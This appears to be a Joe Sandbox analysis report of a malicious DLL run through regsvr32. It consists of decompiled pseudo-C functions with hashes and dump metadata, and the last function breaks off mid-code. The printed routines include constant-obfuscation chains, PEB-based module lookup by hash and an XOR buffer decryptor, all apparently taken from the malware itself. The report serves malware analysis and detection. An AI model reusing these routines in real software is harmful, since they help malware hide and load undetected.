0x04b31e8c
0x04b31e8c
0x04b31e9a

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction ID: 6be8d3a4f2fa53c50652a09f7ee6052e6368ee160af2468ca76a375858eb5dec
Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction Fuzzy Hash: DB5140721093029FC754DF21D88941FBBE1FBD8B58F404E6CF19A56221D7B59A098F87

Uniqueness

Uniqueness Score: -1.00%

Function 04B4FF58, Relevance: .1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04B4FF58(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t121;
				signed int* _t123;
				intOrPtr _t125;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;

				_v24 = 0xfb956e;
				_v24 = _v24 ^ 0xccd4b1e5;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x30bd930f;
				_v44 = 0xac147c;
				_t137 = __edx;
				_v44 = _v44 * 0x49;
				_v44 = _v44 ^ 0x31196cd2;
				_v8 = 0x40a8d3;
				_v8 = _v8 | 0x3acc4d3b;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x3596af33;
				_v40 = 0x7a1af9;
				_v40 = _v40 | 0x9e6699ed;
				_v40 = _v40 ^ 0x9e79921f;
				_v28 = 0x2e80d;
				_v28 = _v28 | 0x96bed856;
				_v28 = _v28 + 0x6398;
				_v28 = _v28 ^ 0x96be47ad;
				_v16 = 0x1a939;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xffff851f;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x0002802d;
				_v12 = 0x8a82de;
				_v12 = _v12 + 0xffff96d2;
				_v12 = _v12 << 0xd;
				_t138 = 0x7d;
				_v12 = _v12 / _t138;
				_v12 = _v12 ^ 0x00892f26;
				_v48 = 0xf49a5c;
				_v48 = _v48 + 0x7176;
				_v48 = _v48 ^ 0x00fa98c0;
				_v52 = 0x2df28f;
				_t139 = 0x75;
				_v52 = _v52 / _t139;
				_v52 = _v52 ^ 0x0004ae50;
				_v36 = 0xfa4daf;
				_v36 = _v36 << 0xc;
				_t140 = 0x6f;
				_v36 = _v36 * 0x11;
				_v36 = _v36 ^ 0xf2876c8f;
				_v32 = 0x3a5591;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00085aff;
				_v20 = 0x5fc7f5;
				_v20 = _v20 / _t140;
				_v20 = _v20 << 0xc;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x000581a9;
				_push(_v40);
				_push(_v8);
				_push(_v44);
				_t121 = L04B352B9(E04B4E1F8(_t123, _v24, _v20), _v28, _v16, _v12, _v48);
				_t125 =  *0x4b5620c; // 0x0
				 *((intOrPtr*)(_t125 + 0x14 + _t137 * 4)) = _t121;
				return E04B4FECB(_t120, _v52, _v36, _v32, _v20);
			}

0x04b4ff5e
0x04b4ff65
0x04b4ff6c
0x04b4ff70
0x04b4ff77
0x04b4ff86
0x04b4ff8a
0x04b4ff8d
0x04b4ff94
0x04b4ff9b
0x04b4ffa2
0x04b4ffa6
0x04b4ffaa
0x04b4ffb1
0x04b4ffb8
0x04b4ffbf
0x04b4ffc6
0x04b4ffcd
0x04b4ffd4
0x04b4ffdb
0x04b4ffe2
0x04b4ffe9
0x04b4ffed
0x04b4fff4
0x04b4fff8
0x04b4ffff
0x04b50006
0x04b5000d
0x04b50014
0x04b50019
0x04b5001e
0x04b50025
0x04b5002c
0x04b50033
0x04b5003a
0x04b50044
0x04b50049
0x04b5004e
0x04b50055
0x04b5005c
0x04b50064
0x04b50065
0x04b50068
0x04b5006f
0x04b50076
0x04b5007a
0x04b5007e
0x04b50085
0x04b50091
0x04b50094
0x04b50098
0x04b5009c
0x04b500a3
0x04b500a6
0x04b500a9
0x04b500c4
0x04b500c9
0x04b500d2
0x04b500ee

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823d5e25111d5b330df597872a9e7efc516458fd682b1914d82288d0609aa1b2
Instruction ID: d4f6ac2622ce613dd8a8e7c358772ed4319e61bacfb45b09dc18ecb682ffc0c0
Opcode Fuzzy Hash: 823d5e25111d5b330df597872a9e7efc516458fd682b1914d82288d0609aa1b2
Instruction Fuzzy Hash: C2410E71D0122DEBCF04DFA1D94A4DEBFB2FB48318F108099D521B6220C3B90A58DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04B43D85, Relevance: .1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E04B43D85(void* __ecx, signed int* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				void* _t46;
				signed int _t49;
				signed int* _t63;
				void* _t69;
				signed int _t72;
				void* _t77;
				unsigned int _t79;
				void* _t81;
				signed int* _t82;
				signed int* _t83;
				void* _t84;

				_t63 = _a4;
				_push(_a8);
				_push(_t63);
				_push(__edx);
				E04B4FE29(_t46);
				_v12 = 0xc30617;
				_t82 =  &(__edx[1]);
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0000aeb3;
				_v20 = 0xf93b19;
				_v20 = _v20 * 0x55;
				_v20 = _v20 ^ 0x85e9037f;
				_v20 = _v20 + 0xffff2dcc;
				_v20 = _v20 ^ 0xd720e096;
				_v16 = 0x37fa8e;
				_v16 = _v16 ^ 0xc309fd15;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x018ad68f;
				_v24 = 0x2aa640;
				_v24 = _v24 | 0xaf302e4c;
				_v24 = _v24 << 2;
				_v24 = _v24 | 0xa0025b53;
				_v24 = _v24 ^ 0xbce807cd;
				_t49 =  *__edx;
				_t83 =  &(_t82[1]);
				_t72 =  *_t82 ^ _t49;
				_v8 = _t49;
				_v4 = _t72;
				_t79 =  !=  ? (_t72 & 0xfffffffc) + 4 : _t72;
				_t84 = E04B3C5D8(_t79);
				if(_t84 == 0) {
					L6:
					return _t84;
				}
				_t81 = 0;
				_t77 =  >  ? 0 :  &(_t83[_t79 >> 2]) - _t83 + 3 >> 2;
				if(_t77 == 0) {
					L4:
					if(_t63 != 0) {
						 *_t63 = _v4;
					}
					goto L6;
				}
				_t69 = _t84 - _t83;
				do {
					_t81 = _t81 + 1;
					 *(_t69 + _t83) =  *_t83 ^ _v8;
					_t83 =  &(_t83[1]);
				} while (_t81 < _t77);
				goto L4;
			}

0x04b43d89
0x04b43d90
0x04b43d94
0x04b43d95
0x04b43d97
0x04b43d9c
0x04b43da4
0x04b43da7
0x04b43dac
0x04b43db4
0x04b43dc1
0x04b43dc5
0x04b43dcd
0x04b43dd5
0x04b43ddd
0x04b43de5
0x04b43ded
0x04b43df2
0x04b43dfa
0x04b43e02
0x04b43e0a
0x04b43e0f
0x04b43e17
0x04b43e1f
0x04b43e23
0x04b43e26
0x04b43e28
0x04b43e2e
0x04b43e3f
0x04b43e5b
0x04b43e62
0x04b43ea2
0x04b43ea9
0x04b43ea9
0x04b43e6c
0x04b43e7a
0x04b43e7f
0x04b43e96
0x04b43e98
0x04b43e9e
0x04b43e9e
0x00000000
0x04b43e98
0x04b43e83
0x04b43e85
0x04b43e8b
0x04b43e8c
0x04b43e8f
0x04b43e92
0x00000000

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction ID: 131270b932ef25d4c5d4bb1c820c412f6b2890f82dbec97702e2ac121ba436a2
Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction Fuzzy Hash: FD319A726093008FD718DF29C98540BBBE2FFC8718F084B6DF889A3214DB74EA058B56

Uniqueness

Uniqueness Score: -1.00%

Function 04B3F0E9, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E04B3F0E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t69;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t69);
				_v8 = 0x819b57;
				_v8 = _v8 >> 0x10;
				_t83 = 0x17;
				_v8 = _v8 / _t83;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00008000;
				_v24 = 0x7d8883;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 + 0xffff5cfc;
				_v24 = _v24 ^ 0xfff105d0;
				_v16 = 0x4e701e;
				_v16 = _v16 ^ 0xb2bd4297;
				_t84 = 0x5b;
				_v16 = _v16 / _t84;
				_t85 = 0x7f;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000cfa43;
				_v12 = 0xc80371;
				_t86 = 0x37;
				_v12 = _v12 / _t86;
				_v12 = _v12 >> 1;
				_t87 = 0x79;
				_v12 = _v12 / _t87;
				_v12 = _v12 ^ 0x0004b486;
				_v20 = 0xa43314;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0xa205;
				_v20 = _v20 ^ 0x052abea0;
				return E04B3F8A9(_v24, _v16, __edx, _v12, _v8, _v20);
			}

0x04b3f0f0
0x04b3f0f5
0x04b3f0f8
0x04b3f0f9
0x04b3f0fa
0x04b3f0ff
0x04b3f108
0x04b3f111
0x04b3f116
0x04b3f11b
0x04b3f11f
0x04b3f126
0x04b3f12d
0x04b3f131
0x04b3f138
0x04b3f13f
0x04b3f146
0x04b3f150
0x04b3f155
0x04b3f15d
0x04b3f162
0x04b3f167
0x04b3f16e
0x04b3f178
0x04b3f17d
0x04b3f182
0x04b3f188
0x04b3f18b
0x04b3f18e
0x04b3f195
0x04b3f19c
0x04b3f1a0
0x04b3f1a7
0x04b3f1ca

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction ID: 7a3d7750e8d920f0a78216210adfd70f8649351a7e135e4f175b8f09546c8197
Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction Fuzzy Hash: A2211576E00209EBDF08CFE5D9099EEBBB2EB54314F20C09AE514AB290D7B55B54DF81

Uniqueness

Uniqueness Score: -1.00%

Function 04B4567B, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04B4567B(void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t66;
				void* _t70;
				signed int _t71;
				signed int _t72;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t83;

				_v16 = 0x3cd044;
				_v16 = _v16 + 0x8a1e;
				_t70 = __edx;
				_t71 = 0x23;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000ceb59;
				_v20 = 0x98fec3;
				_v20 = _v20 + 0x117b;
				_v20 = _v20 ^ 0x00928bce;
				_v12 = 0xc66557;
				_v12 = _v12 | 0xbd5cb058;
				_t72 = 0x6a;
				_v12 = _v12 / _t72;
				_v12 = _v12 * 0x5e;
				_v12 = _v12 ^ 0xa86b283b;
				_v8 = 0xf205aa;
				_v8 = _v8 ^ 0x840ccd49;
				_v8 = _v8 + 0x2990;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0003f43b;
				_v28 = 0xeebda;
				_v28 = _v28 + 0xdccc;
				_v28 = _v28 ^ 0x00000347;
				_v24 = 0xa36d5e;
				_v24 = _v24 | 0xd0b00948;
				_v24 = _v24 ^ 0xd0bd6ebb;
				_t81 =  *((intOrPtr*)(E04B3F7F7() + 0xc)) + 0xc;
				_t82 =  *_t81;
				while(_t82 != _t81) {
					_t66 = E04B3EFE1(_v8, _v28, _v24,  *((intOrPtr*)(_t82 + 0x30)));
					_t83 = _t83 + 0xc;
					if((_t66 ^ 0x2d567c83) == _t70) {
						return  *((intOrPtr*)(_t82 + 0x18));
					}
					_t82 =  *_t82;
				}
				return 0;
			}

0x04b45681
0x04b45688
0x04b45695
0x04b4569b
0x04b456a0
0x04b456a5
0x04b456ac
0x04b456b3
0x04b456ba
0x04b456c1
0x04b456c8
0x04b456d2
0x04b456d5
0x04b456dc
0x04b456df
0x04b456e6
0x04b456ed
0x04b456f4
0x04b456fb
0x04b456ff
0x04b45706
0x04b4570d
0x04b45714
0x04b4571b
0x04b45722
0x04b45729
0x04b4573e
0x04b45741
0x04b45767
0x04b45754
0x04b4575e
0x04b45763
0x00000000
0x04b45774
0x04b45765
0x04b45765
0x00000000

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction ID: 2a78946f1023e8c33513449770965253a2bcc89f7a038f8db6d4f2baa210db17
Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction Fuzzy Hash: D2311C72E00209EFDB54DFA5C9898AEFBB1FB40314F2480A9D515B7210D3B46F559F81

Uniqueness

Uniqueness Score: -1.00%

Function 04B40EBC, Relevance: .1, Instructions: 58
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E04B40EBC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t44;
				intOrPtr* _t51;

				E04B4FE29(_t44);
				_v20 = 0x5f9276;
				_v20 = _v20 >> 6;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x0000ae6f;
				_v16 = 0x7df0fb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x9952d77b;
				_v16 = _v16 ^ 0x9951c792;
				_v12 = 0xf93209;
				_v12 = _v12 | 0xf37a8f1a;
				_v12 = _v12 + 0xffff09ac;
				_v12 = _v12 + 0xa761;
				_v12 = _v12 ^ 0xf3f42664;
				_v8 = 0x4c6886;
				_v8 = _v8 ^ 0x2aaf40fd;
				_v8 = _v8 * 0x7c;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x0632021c;
				_t51 = L04B3EB52(__ecx, __ecx, 0xc0c22a7, 0x4d, 0xa2289af1);
				return  *_t51(0, 0, _a32, _a28, 0, 0, __ecx, 0, _a4, 0, _a12, _a16, 0, 0, _a28, _a32);
			}

0x04b40ed9
0x04b40ede
0x04b40ee8
0x04b40eec
0x04b40ef0
0x04b40ef7
0x04b40efe
0x04b40f02
0x04b40f09
0x04b40f10
0x04b40f17
0x04b40f1e
0x04b40f25
0x04b40f2c
0x04b40f33
0x04b40f3a
0x04b40f52
0x04b40f55
0x04b40f59
0x04b40f6d
0x04b40f85

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction ID: c20a463f663b38216387d1268ad2836a9c105e60d00ab039fb91ea295c99284a
Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction Fuzzy Hash: 9B211F71801219FBCF19DFA1CD4A8DFBFB4FF08358F108688E958A2220D3798A14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B3EF0C, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B3EF0C(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _t57;
				signed int _t67;

				_v28 = 4;
				_v24 = 0xd6e1b5;
				_v24 = _v24 | 0x5e4e7cd1;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x20005ede;
				_v12 = 0x35fbf9;
				_v12 = _v12 << 2;
				_v12 = _v12 + 0xffffd421;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x000779ff;
				_v8 = 0xb66603;
				_v8 = _v8 | 0x4ba1ba6b;
				_v8 = _v8 ^ 0x6df4d1b9;
				_v8 = _v8 ^ 0x1286fe83;
				_v8 = _v8 ^ 0x34cd5dfe;
				_v20 = 0x1bb0b6;
				_v20 = _v20 | 0x21937f20;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x19bd1c5b;
				_v16 = 0xd95204;
				_v16 = _v16 ^ 0x6876e9a1;
				_t67 = 0x62;
				_v16 = _v16 / _t67;
				_v16 = _v16 ^ 0x01180520;
				_t57 = E04B460B8(_v12, _v24 | __edx, _v8,  &_v28,  &_v32, __ecx, __ecx, _v20, _v16);
				asm("sbb eax, eax");
				return  ~_t57 & _v32;
			}

0x04b3ef12
0x04b3ef19
0x04b3ef20
0x04b3ef27
0x04b3ef2b
0x04b3ef32
0x04b3ef39
0x04b3ef3d
0x04b3ef44
0x04b3ef48
0x04b3ef4f
0x04b3ef56
0x04b3ef5d
0x04b3ef64
0x04b3ef6b
0x04b3ef72
0x04b3ef79
0x04b3ef80
0x04b3ef84
0x04b3ef8d
0x04b3ef96
0x04b3efa4
0x04b3efa7
0x04b3efad
0x04b3efcc
0x04b3efd6
0x04b3efe0

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction ID: 4a57bd5a1b44a912a364dc499a7d77cd98aacbd9a80362761af48c664fbcbc3b
Opcode Fuzzy Hash: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction Fuzzy Hash: 5221E372C0120DABDB09DFE5CA4A5EFFBB5EB44204F608299D512B6220D3B55B059BA2

Uniqueness

Uniqueness Score: -1.00%

Function 04B3C5D8, Relevance: .1, Instructions: 53
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04B3C5D8(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _t69;
				signed int _t70;

				_v32 = _v32 & 0x00000000;
				_v36 = 0xa0afa0;
				_v28 = 0x9adc8d;
				_v28 = _v28 ^ 0x90925320;
				_v28 = _v28 ^ 0x90088fa5;
				_v24 = 0x1cb3a6;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0xb3a3d0bd;
				_v8 = 0xc8bfd2;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0x77b2;
				_t69 = 0x16;
				_v8 = _v8 / _t69;
				_v8 = _v8 ^ 0x0000123c;
				_v20 = 0x3ff815;
				_v20 = _v20 | 0x9e661a12;
				_v20 = _v20 + 0x3006;
				_v20 = _v20 ^ 0x9e825c55;
				_v12 = 0xda9b76;
				_t70 = 0x6b;
				_v12 = _v12 / _t70;
				_v12 = _v12 | 0xed94e7c2;
				_v12 = _v12 + 0xffffd684;
				_v12 = _v12 ^ 0xed94606e;
				_v16 = 0x191c50;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x00013f6e;
				return E04B4648A(_a4, _v20, _v12, _v16, E04B528EB(), _v28);
			}

0x04b3c5de
0x04b3c5e4
0x04b3c5eb
0x04b3c5f2
0x04b3c5f9
0x04b3c600
0x04b3c607
0x04b3c60b
0x04b3c612
0x04b3c619
0x04b3c61d
0x04b3c629
0x04b3c62e
0x04b3c633
0x04b3c63a
0x04b3c641
0x04b3c648
0x04b3c64f
0x04b3c656
0x04b3c660
0x04b3c663
0x04b3c666
0x04b3c66d
0x04b3c674
0x04b3c67b
0x04b3c682
0x04b3c686
0x04b3c68a
0x04b3c6b7

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction ID: 42c8898e58cdd753d308bc1a1926abd4d9effe7fe2a152d84328b02fc4592e8b
Opcode Fuzzy Hash: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction Fuzzy Hash: 6121FCB5D0020DEBDF08DFE1C98A5EEBBB1BB54718F208088D525B6260D7B95B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 04B3F7F7, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B3F7F7() {

				return  *[fs:0x30];
			}

0x04b3f7fd

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA3A, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10057a08; // 0x7d1a16f8
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10017BC1(E10027E56, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
